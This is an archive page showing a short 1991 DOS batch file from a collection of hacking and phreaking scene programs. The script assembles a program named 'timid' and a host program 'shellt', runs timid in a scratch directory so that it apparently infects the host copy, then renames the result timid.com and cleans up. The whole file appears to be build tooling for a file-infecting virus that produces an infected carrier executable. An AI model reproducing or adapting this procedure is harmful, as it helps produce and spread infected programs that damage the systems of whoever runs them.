home
***
CD-ROM
|
disk
|
FTP
|
other
***
search
/
Collection of Hack-Phreak Scene Programs
/
cleanhpvac.zip
/
cleanhpvac
/
L.ZIP
/
LITBLA.LZH
/
MAKET_T.BAT
< prev
next >
Wrap
DOS Batch File
|
1991-04-01
|
270b
|
19 lines
md timid
tasm timid,,;
tlink /t timid,,;
copy timid.com timid
tasm shellt,,;
tlink /t shellt,,;
copy shellt.com timid
cd timid
timid
del timid.com
copy shellt.com ..\timid.com
del shellt.com
cd ..
rd timid
del *.obj
del *.lst
del *.map
del shellt.com